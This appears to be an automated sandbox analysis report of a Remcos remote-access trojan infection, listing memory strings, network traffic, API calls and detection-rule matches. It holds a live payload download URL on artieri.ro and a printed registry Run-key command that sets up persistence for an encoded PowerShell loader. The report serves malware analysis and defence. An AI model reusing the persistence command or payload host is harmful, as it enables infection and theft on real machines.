                Source: msiexec.exe, 0000000D.00000002.2427807461.0000000002A73000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B05C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000624A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro/
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin%
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro/g/Skifferdkkers.pcx
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B0D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv68C0.tmp.13.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041183A OpenClipboard,GetLastError,13_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_3980.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B6FC4522_2_00007FFD9B6FC452
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B6FB2962_2_00007FFD9B6FB296
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7CA98A2_2_00007FFD9B7CA98A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7CB19A2_2_00007FFD9B7CB19A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488F3206_2_0488F320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488FBF06_2_0488FBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488EFCC6_2_0488EFCC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488EFD86_2_0488EFD8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488F3146_2_0488F314
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F5B5C19_2_21F5B5C1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F671949_2_21F67194
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B04013_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043610D13_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044731013_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A49013_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040755A13_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043C56013_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B61013_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044D6C013_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004476F013_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B87013_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044081D13_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041495713_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004079EE13_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407AEB13_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044AA8013_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00412AA913_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B7413_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B0313_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044BBD813_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404BE513_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404C7613_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00415CFE13_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00416D7213_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D3013_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D8B13_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406E8F13_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040503815_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041208C15_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004050A915_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040511A15_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043C13A15_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004051AB15_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044930015_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040D32215_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A4F015_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041363115_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044669015_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A73015_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004398D815_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004498E015_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A88615_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043DA0915_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00438D5E15_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00449ED015_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041FE8315_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00430F5415_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004050C216_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004014AB16_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040513316_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004051A416_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040124616_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040CA4616_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040523516_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004032C816_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040168916_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402F6016_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5866
                Source: unknownProcess created: Commandline size = 5890
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5866Jump to behavior
                Source: amsi32_3980.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
